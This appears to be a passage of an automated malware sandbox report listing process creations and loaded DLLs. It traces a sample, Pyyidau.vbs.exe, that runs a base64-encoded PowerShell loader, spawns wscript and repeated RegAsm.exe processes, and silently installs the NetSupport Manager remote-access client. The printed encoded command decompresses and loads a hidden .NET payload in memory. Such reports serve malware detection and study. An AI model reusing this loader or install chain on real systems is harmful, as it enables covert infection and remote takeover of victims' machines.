                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI1387.tmp "C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                Source: C:\Windows\Installer\MSI1387.tmpProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe winst64.exe /q /q /ex /i
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI23E6.tmp "C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                Source: unknownProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Windows\SysWOW64\cscript.exe "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49749
                                Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F1F5193EAAA26C6686643ED3090C1E98Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF373.tmp "C:\Windows\Installer\MSIF373.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EUJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6A6FD5B6F4DA3E504B51BAF4C9444B82 E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF985.tmp "C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EUJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI1387.tmp "C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I * Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI23E6.tmp "C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EIJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Windows\Installer\MSI1387.tmpProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe winst64.exe /q /q /ex /i
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Windows\SysWOW64\cscript.exe "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49749
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrproxy.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
